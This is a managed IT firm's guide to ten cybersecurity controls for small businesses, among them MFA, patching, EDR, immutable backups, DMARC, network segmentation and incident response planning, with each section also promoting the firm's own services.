01
Turn On Multi-Factor Authentication Everywhere
What It Is
Multi-factor authentication, or MFA, adds a second proof of identity beyond the password. The strongest form in 2026 is a passkey, which uses device-bound cryptography and cannot be phished. Time-based one-time codes from an authenticator app are the next best tier. SMS codes are the weakest form and should be phased out wherever a stronger option exists.
Why It Matters
Credential theft is the single most common entry point Petronella Technology Group sees in Triangle incident response. An attacker buys or phishes a working username and password, logs in from a residential proxy in the same region so the sign-in looks normal, and owns the account in seconds. MFA breaks that chain. Even a stolen password is useless without the second factor. Microsoft has reported that account takeover risk drops by more than ninety-nine percent when MFA is enabled, and that figure matches what we observe in the field.
How to Implement
- Email first. Microsoft 365 and Google Workspace both support MFA at the tenant level. Turn it on for every user, not just executives.
- Prefer passkeys where the platform supports them. Apple, Google, Microsoft, and most password managers now speak the standard.
- Use an authenticator app such as Microsoft Authenticator, Duo, or 1Password where passkeys are not available. Avoid SMS as a primary second factor.
- Cover the admin accounts you forget about. Domain registrar, DNS host, payroll, line-of-business cloud apps, and your accounting software all need MFA.
What Petronella Does
For managed clients we enforce MFA through Microsoft Entra Conditional Access or the equivalent in Google Workspace, standardize on passkeys where the vendor supports them, and audit the long tail of SaaS accounts each quarter. Dental practices and small law firms usually have between thirty and seventy SaaS logins hiding in browsers. We inventory them and bring them under unified identity protection.
02
Run a Managed Patch Cadence, Not Just Auto-Update
What It Is
Patch management is the disciplined process of identifying, testing, and deploying security updates to operating systems, browsers, firmware, and business applications. Auto-update is a starting point, not a finish line. It misses third-party apps, firmware on switches and firewalls, server hypervisors, and anything that requires a reboot the user keeps postponing.
Why It Matters
Many of the ransomware cases Petronella Technology Group investigated in 2025 exploited vulnerabilities that had a patch available for months. A defense subcontractor in Apex and a medical billing office in Morrisville were both compromised through unpatched remote access appliances. Regulated industries cannot rely on end users clicking defer. HIPAA, the FTC Safeguards Rule, and CMMC all expect a documented patching program with defined timelines.
How to Implement
- Inventory first. You cannot patch what you do not know about. Document every laptop, server, firewall, switch, printer, and line-of-business app.
- Define a cadence. Critical security patches deploy within seventy-two hours. Non-critical patches deploy on a monthly cycle after staging tests.
- Patch the firmware tier. Firewalls, switches, wireless controllers, storage appliances, and backup servers all ship vulnerabilities that most SMBs never touch.
- Track exceptions. If a legacy medical device or engineering CAD workstation cannot be patched, document the compensating controls and segment it.
What Petronella Does
Our managed IT engagement includes automated patching across workstations, servers, and network gear, with weekly compliance reporting. We stage patches in a controlled group before pushing to the full fleet, and we maintain an exception register for any systems that a vendor restricts from standard patching.
03
Replace Traditional Antivirus With Endpoint Detection and Response
What It Is
Endpoint detection and response, or EDR, monitors every workstation and server for suspicious behavior, not just known malware signatures. Modern EDR platforms combine machine learning models, behavioral analysis, and human-led threat hunting. The best-known names are CrowdStrike, SentinelOne, and Microsoft Defender for Endpoint, though the category is broad. EDR paired with a managed detection and response team becomes MDR, which adds twenty-four hour human oversight.
Why It Matters
Traditional antivirus checks files against a signature database. Modern ransomware often arrives without a file at all. Attackers use living-off-the-land techniques, abusing PowerShell, Windows Management Instrumentation, and legitimate administrative tools already on the box. Signature antivirus sees nothing. EDR records the behavior, correlates it across the environment, and alerts on the pattern.
How to Implement
- Deploy EDR on every endpoint, including servers, remote user laptops, and any Mac in the shop. Gaps are where the intrusion hides.
- Pair it with twenty-four hour monitoring. A tool that fires an alert at two in the morning and nobody reads until Monday is not defense, it is archaeology.
- Tune for your environment. Construction companies run software that looks suspicious to a default policy. Medical practices do too. Tuning cuts noise without reducing coverage.
- Integrate with identity. EDR that sees Entra ID sign-in risk in the same console is substantially more useful than EDR that does not.
What Petronella Does
Petronella Technology Group deploys EDR agents across client fleets and layers managed detection and response with our AI-assisted security operations. Our private AI infrastructure triages alerts continuously so that analysts spend their time on real incidents instead of rule-writing, and clients get measurable mean-time-to-detect numbers rather than a dashboard they never log into.
04
Back Up Data on the 3-2-1 Rule and Actually Test Restore
What It Is
The 3-2-1 backup rule means three copies of your data, on two different media types, with at least one copy offsite and offline. A modern update adds immutability, meaning at least one copy is write-once so ransomware cannot encrypt or delete it even with valid credentials. Recovery time objective and recovery point objective define how quickly you need to be running and how much data you can afford to lose.
Why It Matters
Ransomware attackers now target backups first. They log in, find the backup console, delete the repositories, then detonate the ransomware. A Raleigh construction firm Petronella Technology Group worked with in 2024 thought it had sixty days of backup. It did, on the same server cluster the attackers owned. The restore took three weeks and cost more than the ransom in downtime. Tested, immutable, offsite backups are the single most important control that keeps a small business from paying a ransom.
How to Implement
- Match the 3-2-1 rule: production data, onsite backup, and cloud or tape copy. Make at least one copy immutable.
- Separate backup credentials from production credentials. The backup admin account should not share identity with the domain admin.
- Test restores quarterly. Pick a random file set, restore it to a lab environment, and confirm usability. A backup that has never been tested is a hope, not a control.
- Protect Microsoft 365 and Google Workspace with a third-party backup. Neither vendor is your backup system for Exchange, OneDrive, SharePoint, or Gmail.
What Petronella Does
Backup and disaster recovery is part of every Petronella Technology Group managed engagement. We design against a specific recovery time objective for each client, configure immutable storage, and run quarterly restore tests that produce an auditor-ready report. Dental practices targeting HIPAA and defense subcontractors preparing for a CMMC assessment both use those reports as evidence.
05
Harden Email With SPF, DKIM, DMARC, and AI Phishing Defense
What It Is
Email authentication uses three DNS records that tell the receiving server which systems are allowed to send on your behalf. Sender Policy Framework lists approved sending servers. DomainKeys Identified Mail cryptographically signs each message. Domain-based Message Authentication, Reporting, and Conformance instructs receivers what to do when the first two fail and sends reports back to you. On top of that, modern email security gateways use AI to detect business email compromise, invoice fraud, and executive impersonation.
Why It Matters
Business email compromise is the highest-dollar fraud category the FBI tracks, and small businesses are disproportionately hit. A single wire fraud can wipe out months of profit. Without DMARC set to quarantine or reject, attackers can spoof your domain from outside and send convincing invoices to your clients. Inbound, a spoofed vendor address is how most payroll redirection fraud starts.
How to Implement
- Publish SPF, DKIM, and DMARC records on every domain you send from, including marketing subdomains and any legacy domains.
- Move DMARC to enforcement, starting at p=none for monitoring, then progressing to quarantine, then reject. Review the reports. Most small businesses find shadow email services they forgot.
- Layer an AI email security gateway that inspects language, context, and sender history for business email compromise patterns.
- Train staff on verification-out-of-band for any payment change request. Craig Petronella spent much of 2025 building AI agent systems that triage suspicious email in real time for clients.
What Petronella Does
We publish and maintain DMARC records for managed clients, monitor the aggregate reports, and walk each client up the enforcement ladder. Where appropriate we layer AI-driven phishing defense trained on the client industry. For law firms and CPA offices, we also build a two-person verification workflow for any banking change over a defined threshold.
06
Train the Human Firewall Four Times a Year, Minimum
What It Is
Security awareness training teaches staff to recognize phishing, social engineering, pretexting, smishing, and the business email compromise patterns that target their specific role. Good programs pair short monthly content with periodic simulated phishing and a clear reporting path for suspicious messages. Annual checkbox training is not enough and never was.
Why It Matters
The best technical defenses still lose when a staff member approves an MFA prompt they did not initiate or forwards a W-2 file to a spoofed executive. The goal is not to shame employees, it is to build instinct. A dental office receptionist who pauses on a weird payment email is worth more than an extra firewall.
How to Implement
- Quarterly training at minimum, monthly micro-learning if the platform supports it.
- Realistic simulations. Use templates themed to your industry. Construction firms get fake lien releases and certificate of insurance requests. Medical practices get fake insurance portal lures.
- Frictionless reporting. A one-click report phish button in Outlook or Gmail dramatically improves reporting rates.
- Track trends, not punishment. Use the data to find where training is needed. Individual shaming breaks the reporting culture you need.
What Petronella Does
Petronella Technology Group includes security awareness training and phishing simulation in most managed engagements. Our training academy also hosts role-specific content for HIPAA, CMMC, and general small business awareness. We report on click rates, report rates, and repeat-offender trends each quarter.
07
Segment the Network So a Single Compromise Cannot Spread
What It Is
Network segmentation divides your network into zones so that a device in one zone cannot freely talk to everything in another. A dental office might have separate zones for clinical workstations, front office, guest Wi-Fi, imaging equipment, and an internet-of-things zone for thermostats and cameras. A manufacturer might segment the shop floor from the engineering office. Segmentation is enforced through VLANs, firewall rules, and increasingly through zero-trust network access.
Why It Matters
Flat networks are why one infected workstation becomes a company-wide ransomware event. Once the attacker lands, the next step is lateral movement: scanning for file shares, backup servers, and domain controllers. Segmentation slows that movement down to the point where detection tools can catch it. It is also a direct requirement for HIPAA risk analysis, CMMC Level 2 system boundary definition, and most cyber insurance underwriters.
How to Implement
- Start with clear zones. User workstations, servers, printers and IoT, guest, and management.
- Default-deny between zones. Open only the specific ports the business actually needs.
- Isolate IoT ruthlessly. Cameras, thermostats, smart TVs, and the dentist chair controller should never touch the clinical network.
- Document the boundary. Auditors and insurers want a diagram, not a promise.
What Petronella Does
We redesign networks for segmentation as part of compliance and security engagements. For healthcare clients we build zones that match HIPAA risk analysis boundaries. For defense subcontractors we build CUI enclaves that satisfy CMMC Level 2 scope. Either way the deliverable is a documented, enforced topology rather than a best-guess.
08
Use a Password Manager and Move Toward Zero-Trust Access
What It Is
A password manager is a secure vault that generates, stores, and fills unique passwords for every account. Business-grade options include 1Password Business, Bitwarden Teams, and Keeper. Zero-trust access extends the idea to network resources: instead of a flat VPN that grants the whole network, each application is reached through identity-aware, device-aware access brokers. Every request is verified, regardless of whether the user is in the office or at a coffee shop in Chapel Hill.
Why It Matters
Reused passwords are how credential stuffing attacks win. A password leaked from a retail site three years ago will be tried against your Microsoft 365 tenant tonight. A password manager makes unique, long passwords effortless. Zero-trust access retires the old VPN model that assumes everything inside the perimeter is safe, which is a dangerous assumption once a single laptop is compromised.
How to Implement
- Roll out a business password manager and require all work credentials to live inside it.
- Retire shared passwords. Shared vaults should be the rare exception, auditable and rotation-ready.
- Replace flat VPN with identity-aware access for specific apps, starting with the highest-value systems.
- Enforce device posture. Only managed, patched, EDR-protected devices should reach sensitive systems.
What Petronella Does
We onboard clients to a business password manager, help transition staff from browser-saved passwords, and design zero-trust access paths for cloud apps, remote desktop, and privileged administration. The transition happens in weeks, not months, and users usually report faster sign-ins after, not slower.
09
Write an Incident Response Plan Before You Need It
What It Is
An incident response plan, or IRP, is a short, practical document that describes who does what in the first hours and days after a suspected breach. It names the incident commander, lists outside counsel, forensics, insurance, and regulators, describes communication rules, and spells out decision rights around ransom, notification, and recovery. Regulated businesses have hard clocks. HIPAA and the SEC require disclosure of covered incidents, and CMMC expects documented response. A seventy-two-hour notification window is common and arrives fast.
Why It Matters
The worst moment to figure out who calls the lawyer is at four in the morning with encrypted file servers and a ransom note on screen. A thin, tested IRP cuts hours off the response, reduces bad decisions made under stress, and creates the paper trail regulators expect. Cyber insurance carriers increasingly ask to see it before they bind coverage.
How to Implement
- Keep it short. Ten pages is better than fifty if the ten are accurate and current.
- Name people by role, not just title. Who actually has the phone list at three in the morning?
- Preselect vendors. Forensics, outside counsel, public relations, restoration. Rates negotiated in calm are cheaper than rates negotiated in crisis.
- Tabletop it annually. Walk through a scenario in a conference room. Most plans have at least one gap that only surfaces under stress.
What Petronella Does
Our digital forensics and incident response practice builds and tests IRPs, and we are on retainer as the forensics partner for many Triangle clients. Craig Petronella is Digital Forensic Examiner license number 604180 in North Carolina, holds CMMC-RP, CCNA, and CWNE credentials, and has led incident response for ransomware, business email compromise, cryptocurrency theft, and SIM swap cases across the region.
10
Run Vendor Due Diligence on Your MSP and Your Supply Chain
What It Is
Vendor due diligence is the ongoing practice of verifying that the third parties with access to your data or systems meet your security bar. For a small business that includes the managed service provider, the line-of-business SaaS vendors, the billing service, the payroll processor, the cloud backup provider, and anyone with remote access. Credentials worth checking include SOC 2 Type II reports, HIPAA business associate agreements, and CMMC RPO verification for defense-sector vendors.
Why It Matters
Supply chain compromise is the quiet story of the last three years. Attackers target the managed service provider because one compromise gives them access to dozens of downstream clients. The same pattern runs through SaaS vendors, billing companies, and remote-access tools. A small business cannot audit every vendor to enterprise standards, but it can ask pointed questions and verify the answers.
How to Implement
- Inventory every vendor with data access or network access. Most SMBs find forty to eighty.
- Request SOC 2 or equivalent from any vendor touching sensitive data. A vendor that refuses is a signal.
- Verify CMMC-AB RPO status for any advisor claiming CMMC experience. The registry is public at cyberab.org.
- Right-size access. Remove vendor accounts that are no longer needed. Audit the rest quarterly.
- Contractually require notification of any incident affecting your data, with defined timelines.
What Petronella Does
Petronella Technology Group is a verified CMMC-AB Registered Provider Organization, RPO number 1449, with the entire advisory team CMMC-RP certified. We publish the credentials clients can verify directly, and we build vendor due diligence programs for clients preparing for HIPAA audits, CMMC assessments, and FTC Safeguards Rule examinations. The list of questions we ask a vendor on our clients behalf is the same list we answer ourselves.
